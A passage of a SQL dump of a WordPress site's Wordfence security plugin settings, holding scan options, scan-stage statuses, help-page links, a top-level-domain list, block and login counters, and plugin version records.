;i:1631915400;i:2;i:1632174600;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','license','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1631397000','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','1','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','1','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','1','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','1','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:4;s:8:\"finished\";i:4;s:8:\"expected\";i:4;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1631537673.9607','yes'),('scanType','highsensitivity','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','14','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1631548097;205;51.195.195.165','yes'),('serverIP','1631397184;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1631224477','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1631537669','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','747','yes'),('totalAlertsSent','13','yes'),('totalIPsBlocked','736','yes'),('totalIPsLocked','7','yes'),('totalLoginHits','14429','yes'),('totalLogins','5','yes'),('totalScansRun','108','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','','yes'),('vulnerabilities_plugin','a:8:{i:0;a:5:{s:4:\"slug\";s:7:\"akismet\";s:9:\"toVersion\";s:6:\"4.1.12\";s:11:\"fromVersion\";s:6:\"4.1.10\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:13:\"wordpress-seo\";s:9:\"toVersion\";s:4:\"17.1\";s:11:\"fromVersion\";s:4:\"16.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:4:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:11:\"fromVersion\";s:5:\"4.4.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:4:{s:4:\"slug\";s:17:\"disable-gutenberg\";s:11:\"fromVersion\";s:5:\"2.5.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:4:{s:4:\"slug\";s:11:\"redirection\";s:11:\"fromVersion\";s:5:\"5.1.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:5:\"7.5.5\";s:10:\"vulnerable\